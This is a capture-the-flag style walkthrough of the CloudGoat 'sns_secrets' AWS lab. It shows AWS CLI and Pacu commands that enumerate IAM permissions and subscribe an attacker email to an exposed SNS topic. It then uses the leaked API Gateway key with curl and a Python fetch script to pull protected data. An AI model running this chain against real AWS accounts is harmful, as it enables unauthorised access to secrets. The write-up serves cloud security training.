AWS SNS Secrets: From Misconfiguration to Exploitation - A CloudGoat Walkthrough
This article describes a case in which an AWS SNS misconfiguration leaks sensitive information, showing how an attacker uses an improperly configured SNS topic and an API Gateway key to reach sensitive data held in Secrets Manager. The whole chain from initial access to privilege escalation is reproduced with CloudGoat and the Pacu framework. 2025-8-12 06:7:36 Author: infosecwriteups.com (view original)

VirajMathpati

In today’s cloud-native world, developers rely heavily on services like AWS SNS (Simple Notification Service) to send alerts, logs, and system messages. But what happens when these services are misconfigured?

In this post, I’ll walk you through a real-world-inspired capstone scenario I solved, where secrets were unintentionally exposed via SNS. This write-up will demonstrate how attackers can escalate privileges and extract sensitive information from AWS if best practices aren’t followed.

AWS Simple Notification Service (SNS) is a pub/sub messaging service used to send messages between distributed systems. It supports multiple delivery protocols, such as email, HTTP/S, Lambda, and SQS. Every message published to a topic is delivered to every confirmed subscriber, so if the topic policy or an IAM policy lets an untrusted principal call sns:Subscribe, that principal can read whatever the application publishes. Improper configuration of these access permissions can therefore lead to data leaks or privilege escalation.

Scenario Overview

  • Name: sns_secrets
  • Tool: CloudGoat (by Rhino Security Labs)
  • Initial Access: Low-privileged IAM user
  • Objective: Exploit misconfigured SNS topics to retrieve secrets stored in AWS Secrets Manager

Setup and Initial Access:

To start this scenario, first set up CloudGoat on your machine (the CloudGoat GitHub repository has the details). The command below then deploys the scenario and prints the IAM user credentials:

cloudgoat create sns_secrets

After getting the credentials, configure them as a new AWS CLI profile and use that profile for IAM enumeration. First confirm the access works with the command below.

root@WinLi:~# aws sts get-caller-identity --profile sns

This shows the user name, which is needed to find more information about the IAM user.

Policy enumeration

Check for inline policies attached to the IAM user:

root@WinLi:~# aws iam list-user-policies --user-name cg-sns-user-cgidxi93qpes3g --profile sns
{
    "PolicyNames": [
        "cg-sns-user-policy-cgidxi93qpes3g"
    ]
}

Then check what permissions this policy grants us. Note the second statement: apigateway:GET is allowed in general but explicitly denied on the /apikeys paths and on method and integration details, so the API key cannot simply be read from the API Gateway control plane.

aws iam get-user-policy --user-name cg-sns-user-cgidxi93qpes3g --policy-name cg-sns-user-policy-cgidxi93qpes3g --profile sns
{
    "UserName": "cg-sns-user-cgidxi93qpes3g",
    "PolicyName": "cg-sns-user-policy-cgidxi93qpes3g",
    "PolicyDocument": {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Action": [
                    "sns:Subscribe",
                    "sns:Receive",
                    "sns:ListSubscriptionsByTopic",
                    "sns:ListTopics",
                    "sns:GetTopicAttributes",
                    "iam:ListGroupsForUser",
                    "iam:ListUserPolicies",
                    "iam:GetUserPolicy",
                    "iam:ListAttachedUserPolicies",
                    "apigateway:GET"
                ],
                "Effect": "Allow",
                "Resource": "*"
            },
            {
                "Action": "apigateway:GET",
                "Effect": "Deny",
                "Resource": [
                    "arn:aws:apigateway:us-east-1::/apikeys",
                    "arn:aws:apigateway:us-east-1::/apikeys/*",
                    "arn:aws:apigateway:us-east-1::/restapis/*/resources/*/methods/GET",
                    "arn:aws:apigateway:us-east-1::/restapis/*/methods/GET",
                    "arn:aws:apigateway:us-east-1::/restapis/*/resources/*/integration",
                    "arn:aws:apigateway:us-east-1::/restapis/*/integration",
                    "arn:aws:apigateway:us-east-1::/restapis/*/resources/*/methods/*/integration"
                ]
            }
        ]
    }
}
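To see exactly what those two statements buy an attacker, here is a small policy evaluator (an added example for this write-up, not part of the CloudGoat scenario or the original post). It applies the IAM rule "an explicit Deny wins, otherwise any matching Allow grants, otherwise the request is implicitly denied" to the policy document exactly as printed above. It implements only Action/Resource/Effect with IAM's `*` and `?` wildcards, which is all this policy uses; NotAction, NotResource and Condition are not handled. The account ID and secret name in the sample requests are placeholders, not values from the scenario.

```python
import re

# The inline policy returned by `aws iam get-user-policy` above
# (PolicyDocument only, copied from the write-up).
POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Action": [
                "sns:Subscribe", "sns:Receive", "sns:ListSubscriptionsByTopic",
                "sns:ListTopics", "sns:GetTopicAttributes",
                "iam:ListGroupsForUser", "iam:ListUserPolicies", "iam:GetUserPolicy",
                "iam:ListAttachedUserPolicies", "apigateway:GET",
            ],
            "Effect": "Allow",
            "Resource": "*",
        },
        {
            "Action": "apigateway:GET",
            "Effect": "Deny",
            "Resource": [
                "arn:aws:apigateway:us-east-1::/apikeys",
                "arn:aws:apigateway:us-east-1::/apikeys/*",
                "arn:aws:apigateway:us-east-1::/restapis/*/resources/*/methods/GET",
                "arn:aws:apigateway:us-east-1::/restapis/*/methods/GET",
                "arn:aws:apigateway:us-east-1::/restapis/*/resources/*/integration",
                "arn:aws:apigateway:us-east-1::/restapis/*/integration",
                "arn:aws:apigateway:us-east-1::/restapis/*/resources/*/methods/*/integration",
            ],
        },
    ],
}


def _as_list(value):
    # IAM accepts a single string or a list for Action and Resource.
    return value if isinstance(value, list) else [value]


def _iam_match(pattern, value):
    """IAM-style glob: '*' matches any run of characters (including '/'),
    '?' matches exactly one character, everything else is literal."""
    regex = "".join(".*" if c == "*" else "." if c == "?" else re.escape(c) for c in pattern)
    return re.fullmatch(regex, value) is not None


def evaluate(policy, action, resource):
    """Return 'Allow', 'Deny' (explicit) or 'ImplicitDeny' for one request.
    Identity-policy core only: explicit Deny wins regardless of statement
    order, any matching Allow grants, default is deny. Action names are
    case-insensitive, so both sides are lower-cased for the action check."""
    decision = "ImplicitDeny"
    for stmt in policy["Statement"]:
        action_hit = any(_iam_match(a.lower(), action.lower()) for a in _as_list(stmt["Action"]))
        resource_hit = any(_iam_match(r, resource) for r in _as_list(stmt["Resource"]))
        if not (action_hit and resource_hit):
            continue
        if stmt["Effect"] == "Deny":
            return "Deny"
        decision = "Allow"
    return decision


def apigw_arn(path, region="us-east-1"):
    """ARN form that API Gateway control-plane calls are authorized against
    (no account ID in the ARN, as in the Deny statement above)."""
    return f"arn:aws:apigateway:{region}::{path}"


if __name__ == "__main__":
    # Placeholder account/secret/topic names, not values from the scenario.
    checks = [
        ("apigateway:GET", apigw_arn("/apikeys")),                        # explicit deny: cannot list keys
        ("apigateway:GET", apigw_arn("/apikeys/abcd1234ef")),             # explicit deny: cannot read a key
        ("apigateway:GET", apigw_arn("/restapis")),                       # allowed: discover API IDs
        ("apigateway:GET", apigw_arn("/restapis/x93anl9mj7/stages")),     # allowed: discover the stage name
        ("apigateway:GET", apigw_arn("/restapis/x93anl9mj7/resources")),  # allowed: discover /user-data
        ("secretsmanager:GetSecretValue",
         "arn:aws:secretsmanager:us-east-1:123456789012:secret:placeholder"),  # never granted
        ("sns:Subscribe", "arn:aws:sns:us-east-1:123456789012:placeholder-topic"),  # allowed
    ]
    for action, resource in checks:
        print(f"{evaluate(POLICY, action, resource):<12} {action} {resource}")
```

Running it shows the shape of the scenario: reading or listing API keys is explicitly denied, nothing at all grants Secrets Manager access, but listing REST APIs, their stages and their resources is still allowed and so is sns:Subscribe on any topic. The key therefore has to arrive through the SNS topic, and the allowed apigateway:GET calls are enough to reconstruct the URL to use it against.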

Pacu is a modular AWS exploitation framework created by Rhino Security Labs (the same team behind CloudGoat).

It helps attackers (or pentesters/red teamers) automate:

  • Enumeration
  • Privilege escalation
  • Resource abuse
  • Credential extraction
  • Data exfiltration

If you want to get familiar with Pacu, check out its official documentation.


Pacu (pacu-dev:No Keys Set) >   import_keys sns-secrets

Pacu also has a module, iam__enum_permissions, that enumerates the permissions of the current IAM user; this is the second way of getting the same information that the AWS CLI gave us above.

The "whoami" command then lists the permissions Pacu has confirmed for the active keys.

Since this is an SNS-focused capstone, Pacu's sns__enum module is the next step: it lists the topics visible to our user.

Pacu (sns:imported-sns) > run sns__enum --region us-east-1
Running module sns__enum...
[sns__enum] Starting region us-east-1...
[sns__enum] Found 1 topics
[sns__enum] sns__enum completed.

[sns__enum] MODULE SUMMARY:

Num of SNS topics found: 1
Num of SNS subscribers found: 0

Get the topic's ARN by typing "data", which prints the Pacu database for our session. The ARN is needed for the sns__subscribe module.

Subscribe an attacker-controlled email address to the topic so we can confirm the subscription and receive whatever is published to it:

Pacu (sns:imported-sns) > run sns__subscribe --topics arn:aws:sns:us-east-1:676206926638:public-topic-cgidxi93qpes3g --email [email protected]
Running module sns__subscribe...
[sns__subscribe] Subscribed successfully, check email for subscription confirmation. Confirmation ARN: arn:aws:sns:us-east-1:676206926638:public-topic-cgidxi93qpes3g:d57a831e-54c2-4dee-ae60-58b7fe0beb93
Pacu (sns:imported-sns) >

After confirming the subscription we receive an API Gateway key in the notification. The notification is re-sent every minute until we unsubscribe.

Now we have the API Gateway key, but we need the full invoke URL, so let's enumerate API Gateway with the apigateway:GET permission we still have.

[Screenshot: listing the REST APIs with the AWS CLI to obtain the API ID]

Using this ID we can list the API's stages and resources; the AWS CLI commands in the screenshot above return the stage name and the resource path.

Now we have all the details to fill in the URL:

https://[API-ID].execute-api.us-east-1.amazonaws.com/[stageName]/[resourcePath]
  • API-id: x93anl9mj7
  • StageName: prod-cgidxi93qpes3g
  • ResourcePath: /user-data

The final step is to retrieve the flag. Use the curl command below, sending the key from the SNS notification in the x-api-key header:

curl -X GET "[API Gateway URL]" -H "x-api-key: 45a3da610dc64703b10e273a4db135bf"
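The enumeration and the final request, as an added Python example that is not part of the original post: the three response dicts are constructed samples (not real output) shaped like the JSON returned by `aws apigateway get-rest-apis`, `aws apigateway get-stages --rest-api-id <id>` and `aws apigateway get-resources --rest-api-id <id>`, with the `items`/`item` key names those calls use and the IDs from this scenario filled in. The script crosses API x stage x resource into candidate invoke URLs and, if an API key is given on the command line, fetches each GET-able URL with the x-api-key header exactly as the curl above does; the key is not hard-coded.

```python
import sys
import urllib.error
import urllib.request

# Constructed sample responses (not real output), shaped like:
#   aws apigateway get-rest-apis --profile sns                       -> {"items": [...]}
#   aws apigateway get-stages    --rest-api-id <api-id> --profile sns -> {"item": [...]}
#   aws apigateway get-resources --rest-api-id <api-id> --profile sns -> {"items": [...]}
# All three are still allowed by the policy above; only /apikeys and the
# per-method/integration details are denied.
SAMPLE_REST_APIS = {"items": [{"id": "x93anl9mj7", "name": "sample-api"}]}
SAMPLE_STAGES = {"x93anl9mj7": {"item": [{"stageName": "prod-cgidxi93qpes3g"}]}}
SAMPLE_RESOURCES = {
    "x93anl9mj7": {
        "items": [
            {"id": "aaaaaa", "path": "/"},                                          # root, no methods
            {"id": "bbbbbb", "path": "/user-data", "resourceMethods": {"GET": {}}},  # the target
        ]
    }
}


def invoke_url(api_id, stage, path, region="us-east-1"):
    """Assemble https://[API-ID].execute-api.[region].amazonaws.com/[stage][path]."""
    return f"https://{api_id}.execute-api.{region}.amazonaws.com/{stage}{path}"


def candidate_urls(rest_apis, stages_by_api, resources_by_api, region="us-east-1"):
    """Cross every API x stage x resource that has at least one method into
    (url, [methods]) pairs, so nothing has to be assembled by hand."""
    out = []
    for api in rest_apis["items"]:
        api_id = api["id"]
        for stage in stages_by_api.get(api_id, {}).get("item", []):
            for res in resources_by_api.get(api_id, {}).get("items", []):
                methods = sorted(res.get("resourceMethods", {}))
                if not methods:
                    continue  # e.g. the root "/" resource with nothing attached
                out.append((invoke_url(api_id, stage["stageName"], res["path"], region), methods))
    return out


def fetch(url, api_key, timeout=10):
    """GET the invoke URL with the leaked key in x-api-key (same request as the
    curl above). Returns (status, body); a 403 means the key was rejected."""
    req = urllib.request.Request(url, headers={"x-api-key": api_key}, method="GET")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode()


if __name__ == "__main__":
    # Usage: python3 apigw_enum.py [x-api-key]
    # Without a key the script only prints the candidate URLs built from the samples.
    key = sys.argv[1] if len(sys.argv) > 1 else None
    for url, methods in candidate_urls(SAMPLE_REST_APIS, SAMPLE_STAGES, SAMPLE_RESOURCES):
        print(url, methods)
        if key and "GET" in methods:
            status, body = fetch(url, key)
            print(status, body)
```

To use it against a live deployment, replace the three sample dicts with the parsed output of the corresponding `aws apigateway` commands run with the `sns` profile; the URL-building logic is unchanged.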

FLAG:

Thanks for reading! If you found this helpful, follow me for more cloud security walkthroughs and hands-on write-ups. 🚀🔐


Source: https://infosecwriteups.com/aws-sns-secrets-from-misconfiguration-to-exploitation-a-cloudgoat-walkthrough-68098308b148?source=rss----7b722bfd1b8d---4